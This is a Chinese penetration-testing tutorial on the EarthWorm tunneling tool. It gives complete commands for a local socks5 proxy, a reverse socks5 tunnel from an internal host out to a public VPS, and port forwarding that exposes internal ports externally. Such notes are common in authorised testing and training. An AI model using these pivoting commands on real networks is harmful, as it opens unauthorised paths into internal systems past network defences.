zoukankan      html  css  js  c++  java
  • ew代理实战

    前言

    渗透内网代理必不可少,本文做个记录

    正文

    工具下载地址

    http://rootkiter.com/EarthWorm/
    

    ssocksd开启 socks5 代理

    环境

    代理:192.168.211.131
    
    

    首先使用

     ./ew_for_linux64 -s ssocksd -l 12345
    

    在  192.168.211.131:12345 开启了 socks5 代理,设置 proxifier

    然后在  192.168.211.131 上监听一个端口, 在 192.168.211.1 使用代理连过去。

    可以看到 在 192.168.211.131 收到的连接是由代理服务器 192.168.211.131 发起的

    反弹 socks5 代理到公网vps

    此时我们可以访问 公网vps, 通过在内网主机反弹 socks5 到公网,然后使用公网的 socks5 服务,连入内网。

    首先在公网主机

    ./ew_for_linux64 -s rcsocks -l 1080 -e 8888
    
    -l  本地监听端口,待会连接这个端口作为 socks5 端口
    -e  反弹中转端口
    

    在内网主机

    ./ew_for_linux64 -s rssocks -d vps_ip -e 8888
    
    -d 指定反弹的主机,这里为 公网 vps 的 ip
    -e 指定反弹中转端口,和vps中的设置的一样
    

    此时 vps_ip:1080 开启了 socks5 代理,设置 proxifier

    此时通过代理访问

    利用lcx_tran端口转发转接socks代理

    通过 192.168.211.1311088 端口使用 192.168.211.1329999 端口提供的 socks5 代理。

    192.168.211.131 执行

    ./ew_for_linux64 -s lcx_tran -l 1088 -f 192.168.211.132 -g 9999
    
    将来自 1088 的数据转发至 192.168.211.132:9999 
    

    192.168.211.132 执行

    ew_for_Win.exe -s ssocksd -l 9999
    

    然后使用 192.168.211.131:1088 作为 socks5 代理即可

    lcx_slave 反向端口转发

    使用 lcx_slave 实现将内网端口映射到公网。

    首先在公网主机

    ./ew_for_linux64 -s lcx_listen -l 12234 -e 8989
    
    lcx_listen 本地端口转发,将 12234 转发到 8989
    

    然后在内网主机

    ew_for_Win.exe -s lcx_slave -d vps_ip -e 8989 -f 127.0.0.1 -g 9999
    
    lcx_slave 将 vps_ip:8989 的数据转发至   127.0.0.1:9999
    

    然后访问 vps_ip:12234 就是访问 内网主机ip:9999

    
    【参数说明】
    
    ssocksd 本地 socks代理
    rssocks 反弹 socks代理
    
    lcx_slave  将远程主机的端口 与 另一台主机建立联系
    lcx_tran  将本地端口转发至远程主机
    lcx_listen 本地端口转发,本地端口之间建立转发关系
    
  • 相关阅读:
    maven打包
    (和)后台解析
    beetl简单阅览
    snmp在win10上安装使用
    javaMail发送邮件
    mysql 安装配置详解
    vsftpd的主配置文件详解
    linux下vi命令笔记
    linux下sed命令笔记
    linux下grep命令笔记
  • 原文地址:https://www.cnblogs.com/hac425/p/9416925.html
Copyright © 2011-2022 走看看